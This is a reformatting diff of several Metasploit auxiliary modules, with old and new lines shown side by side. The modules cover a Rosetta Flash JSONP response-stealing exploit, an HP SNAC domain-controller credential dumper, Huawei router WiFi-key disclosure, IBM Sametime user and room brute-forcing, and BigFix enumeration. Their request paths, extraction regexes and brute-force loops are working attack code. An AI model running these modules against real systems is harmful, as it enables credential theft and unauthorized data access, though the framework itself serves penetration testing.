steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.
super(
update_info(
info,
'Name' => 'Flash "Rosetta" JSONP GET/POST Response Disclosure',
'Description' => %q{
A website that serves a JSONP endpoint that accepts a custom alphanumeric
callback of 1200 chars can be abused to serve an encoded swf payload that
steals the contents of a same-domain URL. Flash < 14.0.0.145 is required.
This module spins up a web server that, upon navigation from a user, attempts
to abuse the specified JSONP endpoint URLs by stealing the response from
GET requests to STEAL_URLS.
},
'License' => MSF_LICENSE,
'Author' => [
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
'joev' # metasploit module
],
'References' =>
[
This module spins up a web server that, upon navigation from a user, attempts
to abuse the specified JSONP endpoint URLs by stealing the response from
GET requests to STEAL_URLS.
},
'License' => MSF_LICENSE,
'Author' => [
'Michele Spagnuolo', # discovery, wrote rosetta encoder, disclosure
'joev' # metasploit module
],
'References' => [
['CVE', '2014-4671'],
['URL', 'http://miki.it/blog/2014/7/8/abusing-jsonp-with-rosetta-flash/'],
['URL', 'https://github.com/mikispag/rosettaflash'],
['URL', 'https://www.quaxio.com/jsonp_handcrafted_flash_files/']
],
'DisclosureDate' => '2014-07-08',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'))
'DisclosureDate' => '2014-07-08',
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'DefaultAction' => 'WebServer'
)
)
register_options(
[
@@ -46,7 +49,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('STEAL_URLS', [ true, 'A comma-separated list of URLs to steal', '' ]),
OptString.new('URIPATH', [ true, 'The URI path to serve the exploit under', '/' ])
],
self.class)
self.class
)
end
def run
@@ -81,7 +85,7 @@ class MetasploitModule < Msf::Auxiliary
file = store_loot(
"html", "text/plain", cli.peerhost, body, "flash_jsonp_rosetta", "Exfiltrated HTTP response"
)
url = body.lines.first.gsub(/.*?=/,'')
url = body.lines.first.gsub(/.*?=/, '')
print_good "#{body.length} bytes captured from target #{cli.peerhost} on URL:\n#{url}"
print_good "Stored in #{file}"
else
@@ -96,7 +100,7 @@ class MetasploitModule < Msf::Auxiliary
end
def exploit_html
ex_url = URI::DEFAULT_PARSER.escape(get_uri.chomp('/')+'/'+Rex::Text.rand_text_alphanumeric(6+rand(20))+'.log')
ex_url = URI::DEFAULT_PARSER.escape(get_uri.chomp('/') + '/' + Rex::Text.rand_text_alphanumeric(6 + rand(20)) + '.log')
%Q|
<!doctype html>
<html>
modules/auxiliary/gather/hp_enum_perfd.rb
+8 -8
View File
@@ -15,21 +15,22 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'HP Operations Manager Perfd Environment Scanner',
'Name' => 'HP Operations Manager Perfd Environment Scanner',
'Description' => %q{
This module will enumerate the process list of a remote machine by abusing
HP Operation Manager's unauthenticated 'perfd' daemon.
},
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
'License' => MSF_LICENSE
'Author' => [ 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' ],
'License' => MSF_LICENSE
)
commands_help = ALLOWED_COMMANDS.join(',')
register_options(
[
Opt::RPORT(5227),
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
])
[
Opt::RPORT(5227),
OptString.new("COMMANDS", [true, "Command(s) to execute (one or more of #{commands_help})", commands_help])
]
)
end
def commands
@@ -48,7 +49,6 @@ class MetasploitModule < Msf::Auxiliary
def run_host(target_host)
begin
connect
banner_resp = sock.get_once
if banner_resp && banner_resp =~ /^Welcome to the perfd server/
modules/auxiliary/gather/hp_snac_domain_creds.rb
+23 -26
View File
@@ -10,37 +10,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HP ProCurve SNAC Domain Controller Credential Dumper',
'Description' => %q{
This module will extract Domain Controller credentials from vulnerable installations of HP
SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability
has been used to exploit remote file uploads. This vulnerability can be used to gather important
information handled by the vulnerable application, like plain text domain controller
credentials. This module has been tested successfully with HP SNAC included with ProCurve
Manager 4.0.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'HP ProCurve SNAC Domain Controller Credential Dumper',
'Description' => %q{
This module will extract Domain Controller credentials from vulnerable installations of HP
SNAC as distributed with HP ProCurve 4.00 and 3.20. The authentication bypass vulnerability
has been used to exploit remote file uploads. This vulnerability can be used to gather important
information handled by the vulnerable application, like plain text domain controller
credentials. This module has been tested successfully with HP SNAC included with ProCurve
Manager 4.0.
},
'References' => [
['URL', 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03897409']
],
'Author' =>
[
'Author' => [
'rgod <rgod[at]autistici.org>', # Auth bypass discovered by
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'DefaultOptions' =>
{
'License' => MSF_LICENSE,
'DefaultOptions' => {
'SSL' => true,
},
'DisclosureDate' => '2013-09-09'
))
'DisclosureDate' => '2013-09-09'
)
)
register_options(
[
Opt::RPORT(443)
])
]
)
end
def get_domain_info(session)
@@ -86,7 +87,6 @@ class MetasploitModule < Msf::Auxiliary
return results
end
def report_cred(opts)
service_data = {
address: opts[:ip],
@@ -113,9 +113,7 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(login_data)
end
def run
print_status("Get Domain Info")
session = get_session
@@ -141,8 +139,8 @@ class MetasploitModule < Msf::Auxiliary
end
cred_table = Rex::Text::Table.new(
'Header' => 'Domain Controllers Credentials',
'Indent' => 1,
'Header' => 'Domain Controllers Credentials',
'Indent' => 1,
'Columns' => ['Domain Controller', 'Username', 'Password']
)
@@ -160,6 +158,5 @@ class MetasploitModule < Msf::Auxiliary
print_line
print_line(cred_table.to_s)
end
end
modules/auxiliary/gather/http_pdf_authors.rb
+30 -21
View File
@@ -8,30 +8,34 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'Gather PDF Authors',
'Description' => %q{
This module downloads PDF documents and extracts the author's
name from the document metadata.
super(
update_info(
info,
'Name' => 'Gather PDF Authors',
'Description' => %q{
This module downloads PDF documents and extracts the author's
name from the document metadata.
This module expects a URL to be provided using the URL option.
Alternatively, multiple URLs can be provided by supplying the
path to a file containing a list of URLs in the URL_LIST option.
This module expects a URL to be provided using the URL option.
Alternatively, multiple URLs can be provided by supplying the
path to a file containing a list of URLs in the URL_LIST option.
The URL_TYPE option is used to specify the type of URLs supplied.
The URL_TYPE option is used to specify the type of URLs supplied.
By specifying 'pdf' for the URL_TYPE, the module will treat
the specified URL(s) as PDF documents. The module will
download the documents and extract the authors' names from the
document metadata.
By specifying 'pdf' for the URL_TYPE, the module will treat
the specified URL(s) as PDF documents. The module will
download the documents and extract the authors' names from the
document metadata.
By specifying 'html' for the URL_TYPE, the module will treat
the specified URL(s) as HTML pages. The module will scrape the
pages for links to PDF documents, download the PDF documents,
and extract the author's name from the document metadata.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles'))
By specifying 'html' for the URL_TYPE, the module will treat
the specified URL(s) as HTML pages. The module will scrape the
pages for links to PDF documents, download the PDF documents,
and extract the author's name from the document metadata.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles'
)
)
deregister_http_client_options
@@ -41,7 +45,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('URL_LIST', [ false, 'File containing a list of target URLs', '' ]),
OptEnum.new('URL_TYPE', [ true, 'The type of URL(s) specified', 'html', [ 'pdf', 'html' ] ]),
OptBool.new('STORE_LOOT', [ false, 'Store authors in loot', true ])
])
]
)
end
def progress(current, total)
@@ -147,8 +152,10 @@ class MetasploitModule < Msf::Auxiliary
pdf_urls = []
urls.each_with_index do |url, index|
next if url.blank?
html = download url
next if html.blank?
doc = Nokogiri::HTML html
doc.search('a[href]').select { |n| n['href'][/(\.pdf$|\.pdf\?)/] }.map do |n|
pdf_urls << URI.join(url, n['href']).to_s
@@ -166,8 +173,10 @@ class MetasploitModule < Msf::Auxiliary
max_len = 256
urls.each_with_index do |url, index|
next if url.blank?
file = download url
next if file.blank?
pdf = StringIO.new
pdf.puts file
author = read pdf
modules/auxiliary/gather/huawei_wifi_info.rb
+72 -66
View File
@@ -10,73 +10,75 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
BASIC_INFO = {
'Device Name' => /<DeviceName>(.*)<\/DeviceName>/i,
'Serial Number' => /<SerialNumber>(.*)<\/SerialNumber>/i,
'IMEI' => /<Imei>(.*)<\/Imei>/i,
'IMSI' => /<Imsi>(.*)<\/Imsi>/i,
'ICCID' => /<Iccid>(.*)<\/Iccid>/i,
'Device Name' => /<DeviceName>(.*)<\/DeviceName>/i,
'Serial Number' => /<SerialNumber>(.*)<\/SerialNumber>/i,
'IMEI' => /<Imei>(.*)<\/Imei>/i,
'IMSI' => /<Imsi>(.*)<\/Imsi>/i,
'ICCID' => /<Iccid>(.*)<\/Iccid>/i,
'Hardware Version' => /<HardwareVersion>(.*)<\/HardwareVersion>/i,
'Software Version' => /<SoftwareVersion>(.*)<\/SoftwareVersion>/i,
'WebUI Version' => /<WebUIVersion>(.*)<\/WebUIVersion>/i,
'Mac Address1' => /<MacAddress1>(.*)<\/MacAddress1>/i,
'Mac Address2' => /<MacAddress2>(.*)<\/MacAddress2>/i,
'Product Family' => /<ProductFamily>(.*)<\/ProductFamily>/i,
'Classification' => /<Classify>(.*)<\/Classify>/i
'WebUI Version' => /<WebUIVersion>(.*)<\/WebUIVersion>/i,
'Mac Address1' => /<MacAddress1>(.*)<\/MacAddress1>/i,
'Mac Address2' => /<MacAddress2>(.*)<\/MacAddress2>/i,
'Product Family' => /<ProductFamily>(.*)<\/ProductFamily>/i,
'Classification' => /<Classify>(.*)<\/Classify>/i
}
WAN_INFO = {
'Wan IP Address' => /<WanIPAddress>(.*)<\/WanIPAddress>/i,
'Primary Dns' => /<PrimaryDns>(.*)<\/PrimaryDns>/i,
'Secondary Dns' => /<SecondaryDns>(.*)<\/SecondaryDns>/i
'Primary Dns' => /<PrimaryDns>(.*)<\/PrimaryDns>/i,
'Secondary Dns' => /<SecondaryDns>(.*)<\/SecondaryDns>/i
}
DHCP_INFO ={
'LAN IP Address' => /<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i,
DHCP_INFO = {
'LAN IP Address' => /<DhcpIPAddress>(.*)<\/DhcpIPAddress>/i,
'DHCP StartIPAddress' => /<DhcpStartIPAddress>(.*)<\/DhcpStartIPAddress>/i,
'DHCP EndIPAddress' => /<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i,
'DHCP Lease Time' => /<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i
'DHCP EndIPAddress' => /<DhcpEndIPAddress>(.*)<\/DhcpEndIPAddress>/i,
'DHCP Lease Time' => /<DhcpLeaseTime>(.*)<\/DhcpLeaseTime>/i
}
WIFI_INFO = {
'Wifi WPA pre-shared key' => /<WifiWpapsk>(.*)<\/WifiWpapsk>/i,
'Wifi Auth mode' => /<WifiAuthmode>(.*)<\/WifiAuthmode>/i,
'Wifi WPA pre-shared key' => /<WifiWpapsk>(.*)<\/WifiWpapsk>/i,
'Wifi Auth mode' => /<WifiAuthmode>(.*)<\/WifiAuthmode>/i,
'Wifi Basic encryption modes' => /<WifiBasicencryptionmodes>(.*)<\/WifiBasicencryptionmodes>/i,
'Wifi WPA Encryption Modes' => /<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i,
'Wifi WEP Key1' => /<WifiWepKey1>(.*)<\/WifiWepKey1>/i,
'Wifi WEP Key2' => /<WifiWepKey2>(.*)<\/WifiWepKey2>/i,
'Wifi WEP Key3' => /<WifiWepKey3>(.*)<\/WifiWepKey3>/i,
'Wifi WEP Key4' => /<WifiWepKey4>(.*)<\/WifiWepKey4>/i,
'Wifi WEP Key Index' => /<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i
'Wifi WPA Encryption Modes' => /<WifiWpaencryptionmodes>(.*)<\/WifiWpaencryptionmodes>/i,
'Wifi WEP Key1' => /<WifiWepKey1>(.*)<\/WifiWepKey1>/i,
'Wifi WEP Key2' => /<WifiWepKey2>(.*)<\/WifiWepKey2>/i,
'Wifi WEP Key3' => /<WifiWepKey3>(.*)<\/WifiWepKey3>/i,
'Wifi WEP Key4' => /<WifiWepKey4>(.*)<\/WifiWepKey4>/i,
'Wifi WEP Key Index' => /<WifiWepKeyIndex>(.*)<\/WifiWepKeyIndex>/i
}
def initialize(info={})
super(update_info(info,
'Name' => "Huawei Datacard Information Disclosure Vulnerability",
'Description' => %q{
This module exploits an unauthenticated information disclosure vulnerability in Huawei
SOHO routers. The module will gather information by accessing the /api pages where
authentication is not required, allowing configuration changes as well as information
disclosure, including any stored SMS.
},
'License' => MSF_LICENSE,
'Author' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => "Huawei Datacard Information Disclosure Vulnerability",
'Description' => %q{
This module exploits an unauthenticated information disclosure vulnerability in Huawei
SOHO routers. The module will gather information by accessing the /api pages where
authentication is not required, allowing configuration changes as well as information
disclosure, including any stored SMS.
},
'License' => MSF_LICENSE,
'Author' => [
'Jimson K James',
'Tom James <tomsmaily[at]aczire.com>', # Msf module
],
'References' =>
[
'References' => [
['CWE', '425'],
['CVE', '2013-6031'],
['US-CERT-VU', '341526']
],
'DisclosureDate' => '2013-11-11' ))
'DisclosureDate' => '2013-11-11'
)
)
register_options(
[
Opt::RHOST('mobilewifi.home')
])
]
)
end
# Gather basic router information
@@ -93,13 +95,13 @@ class MetasploitModule < Msf::Auxiliary
end
def get_wifi_info
print_status("Getting WiFi Key details...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/security-settings',
})
'method' => 'GET',
'uri' => '/api/wlan/security-settings',
}
)
unless is_target?(res)
return
@@ -116,7 +118,7 @@ class MetasploitModule < Msf::Auxiliary
log << "WiFi SSID: #{wifi_ssid}\n"
end
WIFI_INFO.each do |k,v|
WIFI_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
@@ -132,13 +134,13 @@ class MetasploitModule < Msf::Auxiliary
end
def get_router_info
print_status("Gathering basic device information...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/device/information',
})
'method' => 'GET',
'uri' => '/api/device/information',
}
)
unless is_target?(res)
return
@@ -148,7 +150,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Basic Information")
BASIC_INFO.each do |k,v|
BASIC_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
@@ -161,9 +163,10 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/basic-settings',
})
'method' => 'GET',
'uri' => '/api/wlan/basic-settings',
}
)
# check whether we got any response from server and proceed.
unless is_target?(res)
@@ -184,9 +187,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Gathering MAC filters...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/wlan/mac-filter',
})
'method' => 'GET',
'uri' => '/api/wlan/mac-filter',
}
)
unless is_target?(res)
return
@@ -198,7 +202,7 @@ class MetasploitModule < Msf::Auxiliary
if resp_body.match(/<WifiMacFilterStatus>(.*)<\/WifiMacFilterStatus>/i)
wifi_mac_filter_status = $1
print_status("Wifi MAC Filter Status: #{(wifi_mac_filter_status == '1') ? 'ENABLED' : 'DISABLED'}" )
print_status("Wifi MAC Filter Status: #{(wifi_mac_filter_status == '1') ? 'ENABLED' : 'DISABLED'}")
end
(0..9).each do |i|
@@ -215,9 +219,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Gathering WAN information...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/monitoring/status',
})
'method' => 'GET',
'uri' => '/api/monitoring/status',
}
)
unless is_target?(res)
return
@@ -227,7 +232,7 @@ class MetasploitModule < Msf::Auxiliary
print_status('WAN Details')
WAN_INFO.each do |k,v|
WAN_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
@@ -239,9 +244,10 @@ class MetasploitModule < Msf::Auxiliary
print_status("Gathering DHCP information...")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/api/dhcp/settings',
})
'method' => 'GET',
'uri' => '/api/dhcp/settings',
}
)
unless is_target?(res)
return
@@ -261,7 +267,7 @@ class MetasploitModule < Msf::Auxiliary
return
end
DHCP_INFO.each do |k,v|
DHCP_INFO.each do |k, v|
if resp_body.match(v)
info = $1
print_status("#{k}: #{info}")
modules/auxiliary/gather/ibm_bigfix_sites_packages_enum.rb
+20 -19
View File
@@ -8,32 +8,32 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM BigFix Relay Server Sites and Package Enum',
'Description' => %q{
This module retrieves masthead, site, and available package information
from IBM BigFix Relay Servers.
},
'Author' =>
[
'HD Moore', # Vulnerability Discovery
super(
update_info(
info,
'Name' => 'IBM BigFix Relay Server Sites and Package Enum',
'Description' => %q{
This module retrieves masthead, site, and available package information
from IBM BigFix Relay Servers.
},
'Author' => [
'HD Moore', # Vulnerability Discovery
'Chris Bellows', # Vulnerability Discovery
'Ryan Hanson', # Vulnerability Discovery
'Jacob Robles' # Metasploit module
],
'References' =>
[
['CVE','2019-4061'],
['URL','https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers']
'References' => [
['CVE', '2019-4061'],
['URL', 'https://www.atredis.com/blog/2019/3/18/harvesting-data-from-bigfix-relay-servers']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'RPORT' => 52311,
'SSL' => true
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2019-03-18' # Blog post date
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2019-03-18'
)
) # Blog post date
register_options [
OptString.new('TARGETURI', [true, 'Path to the BigFix server', '/']),
@@ -115,6 +115,7 @@ class MetasploitModule < Msf::Auxiliary
print_status('Downloading packages')
@files.each do |action, val|
next if val.empty?
res = send_req("bfmirror/downloads/#{action}/0")
next unless res && res.code == 200
modules/auxiliary/gather/ibm_sametime_enumerate_users.rb
+51 -49
View File
@@ -10,48 +10,50 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Notes Sametime User Enumeration',
'Description' => %q{
This module extracts usernames using the IBM Lotus Notes Sametime web
interface using either a dictionary attack (which is preferred), or a
bruteforce attack trying all usernames of MAXDEPTH length or less.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'IBM Lotus Notes Sametime User Enumeration',
'Description' => %q{
This module extracts usernames using the IBM Lotus Notes Sametime web
interface using either a dictionary attack (which is preferred), or a
bruteforce attack trying all usernames of MAXDEPTH length or less.
},
'Author' => [
'kicks4kittens' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-3975' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [ true, 'The path to the userinfo script', '/userinfo/search']),
OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
OptEnum.new('TYPE', [true, 'Specify UID or EMAIL', 'UID', ['UID', 'EMAIL'] ]),
OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2])
])
OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during bruteforce', 2])
]
)
register_advanced_options(
[
OptString.new('SpecialChars', [false, 'Specify special chars (e.g. -_+!@&$/\?)', '' ]),
OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']),
OptString.new('SUFFIX', [ false, 'Defines set post for each guess (e.g. _adm)', '']),
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
])
OptString.new('PREFIX', [ false, 'Defines set prefix for each guess (e.g. user)', '']),
OptString.new('SUFFIX', [ false, 'Defines set post for each guess (e.g. _adm)', '']),
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
]
)
end
def setup
@@ -73,7 +75,7 @@ class MetasploitModule < Msf::Auxiliary
end
if datastore['SpecialChars']
datastore['SpecialChars'].chars do | spec |
datastore['SpecialChars'].chars do |spec|
@charset.push(Rex::Text.uri_encode(spec))
end
end
@@ -108,13 +110,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['TYPE'] == "UID"
random_val = Rex::Text.rand_text_alpha(32)
else
random_val = Rex::Text.rand_text_alpha(32) +"@"+ Rex::Text.rand_text_alpha(16) + ".com"
random_val = Rex::Text.rand_text_alpha(32) + "@" + Rex::Text.rand_text_alpha(16) + ".com"
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => random_val
@@ -187,11 +189,10 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
t.each {|x| x.join }
t.each { |x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
t.each { |x| x.kill rescue nil }
end
end
end
@@ -206,9 +207,9 @@ class MetasploitModule < Msf::Auxiliary
end
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'uri' => normalize_uri(target_uri.path),
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'mode' => datastore['TYPE'].downcase,
'searchText' => tstring
@@ -256,7 +257,7 @@ class MetasploitModule < Msf::Auxiliary
# To find all users the queue must be extended by adding 'aa' through to 'az'
def extend_queue(test_current)
if test_current.length < datastore['MAXDEPTH']
@charset.each do | char |
@charset.each do |char|
@test_queue.push(test_current + char)
end
elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1
@@ -267,12 +268,12 @@ class MetasploitModule < Msf::Auxiliary
def report_user(username)
report_note(
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => 'sametime',
:type => 'ibm_lotus_sametime_user',
:data => { :username => username },
:host => rhost,
:port => rport,
:proto => 'tcp',
:sname => 'sametime',
:type => 'ibm_lotus_sametime_user',
:data => { :username => username },
:update => :unique_data
)
end
@@ -282,18 +283,19 @@ class MetasploitModule < Msf::Auxiliary
user_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Users",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Users",
'Prefix' => "\n",
'Indent' => 1,
'Columns' =>
[
"UID",
"Email",
"CommonName"
])
]
)
# populate tables
@user_data.each do | line |
@user_data.each do |line|
user_tbl << [ line[0], line[1], line[2] ]
end
modules/auxiliary/gather/ibm_sametime_room_brute.rb
+46 -47
View File
@@ -10,42 +10,44 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Notes Sametime Room Name Bruteforce',
'Description' => %q{
This module bruteforces Sametime meeting room names via the IBM
Lotus Notes Sametime web interface.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'IBM Lotus Notes Sametime Room Name Bruteforce',
'Description' => %q{
This module bruteforces Sametime meeting room names via the IBM
Lotus Notes Sametime web interface.
},
'Author' => [
'kicks4kittens' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-3977' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('OWNER', [ true, 'The owner to bruteforce meeting room names for', '']),
OptPath.new('DICT', [ true, 'The path to the userinfo script' ]),
OptString.new('OWNER', [ true, 'The owner to bruteforce meeting room names for', '']),
OptPath.new('DICT', [ true, 'The path to the userinfo script' ]),
OptString.new('TARGETURI', [ true, 'Path to stmeetings', '/stmeetings/'])
])
]
)
register_advanced_options(
[
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
])
OptInt.new('TIMING', [ true, 'Set pause between requests', 0]),
OptInt.new('Threads', [ true, 'Number of test threads', 10])
]
)
end
def run
@@ -58,13 +60,13 @@ class MetasploitModule < Msf::Auxiliary
@reqpath = normalize_uri(uri, '/restapi')
res = send_request_cgi({
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' => {
'owner' => datastore['OWNER'],
'permaName' => rval
}
}
})
unless res
@@ -89,7 +91,7 @@ class MetasploitModule < Msf::Auxiliary
print_status("Beginning dictionary bruteforce using (#{datastore['Threads']} Threads)")
while(not @test_queue.empty?)
while (not @test_queue.empty?)
t = []
nt = datastore['Threads'].to_i
nt = 1 if nt <= 0
@@ -114,11 +116,10 @@ class MetasploitModule < Msf::Auxiliary
end
end
end
t.each {|x| x.join }
t.each { |x| x.join }
rescue ::Timeout::Error
ensure
t.each {|x| x.kill rescue nil }
t.each { |x| x.kill rescue nil }
end
end
end
@@ -131,9 +132,9 @@ class MetasploitModule < Msf::Auxiliary
end
res = send_request_cgi({
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'uri' => @reqpath,
'method' => 'GET',
'ctype' => 'text/html',
'vars_get' =>
{
'owner' => datastore['OWNER'],
@@ -157,36 +158,34 @@ class MetasploitModule < Msf::Auxiliary
end
def output_table(room_info, test_current)
print_good("New meeting room found: #{test_current}")
# print output table for discovered meeting rooms
roomtbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "[IBM Lotus Sametime] Meeting Room #{test_current}",
'Prefix' => "",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Key",
"Value"
]
)
'Header' => "[IBM Lotus Sametime] Meeting Room #{test_current}",
'Prefix' => "",
'Postfix' => "\n",
'Indent' => 1,
'Columns' =>
[
"Key",
"Value"
]
)
room_info['results'][0].each do |k, v|
if v.is_a?(Hash)
# breakdown Hash
roomtbl << [ k.to_s, '>>' ] # title line
v.each do | subk, subv |
roomtbl << [ "#{k.to_s}:#{subk.to_s}", subv.to_s || "-"] if not v.nil? or v.empty?
v.each do |subk, subv|
roomtbl << [ "#{k.to_s}:#{subk.to_s}", subv.to_s || "-"] if not v.nil? or v.empty?
end
else
roomtbl << [ k.to_s, v.to_s || "-"] unless v.nil?
roomtbl << [ k.to_s, v.to_s || "-"] unless v.nil?
end
end
# output table
print_good(roomtbl.to_s)
end
end
modules/auxiliary/gather/ibm_sametime_version.rb
+60 -58
View File
@@ -10,16 +10,16 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
URLS = [
'/stmeetings/about.jsp',
'/stmeetings/serverversion.properties',
'/rtc/buildinfo.txt',
'/stmeetings/configuration?format=json&verbose=true'
'/stmeetings/about.jsp',
'/stmeetings/serverversion.properties',
'/rtc/buildinfo.txt',
'/stmeetings/configuration?format=json&verbose=true'
]
PROXY_URLS = [
'/stwebclient/i18nStrings.jsp',
'/stwebclient/communityserver',
'/stwebav/WebAVServlet?Name=WebPlayerVersion'
'/stwebclient/i18nStrings.jsp',
'/stwebclient/communityserver',
'/stwebav/WebAVServlet?Name=WebPlayerVersion'
]
JSON_KEYS = [
@@ -46,7 +46,7 @@ class MetasploitModule < Msf::Auxiliary
INFO_REGEXS = [
# section, key, regex
[ 'version', 'sametimeVersion', /lotusBuild">Release (.+?)<\/td>/i ],
[ 'api', 'meeting', /^meeting=(.*)$/i ],
[ 'api', 'meeting', /^meeting=(.*)$/i ],
[ 'api', 'appshare', /^appshare=(.*)$/i ],
[ 'api', 'docshare', /^docshare=(.*)$/i ],
[ 'api', 'rtc4web', /^rtc4web=(.*)$/i ],
@@ -56,50 +56,49 @@ class MetasploitModule < Msf::Auxiliary
[ 'api', 'video', /^video=(.*)$/i]
]
def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Sametime Version Enumeration',
'Description' => %q{
This module scans an IBM Lotus Sametime web interface to enumerate
the application's version and configuration information.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'IBM Lotus Sametime Version Enumeration',
'Description' => %q{
This module scans an IBM Lotus Sametime web interface to enumerate
the application's version and configuration information.
},
'Author' => [
'kicks4kittens' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2013-3982' ],
[ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21671201']
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'SSL' => true
},
'License' => MSF_LICENSE,
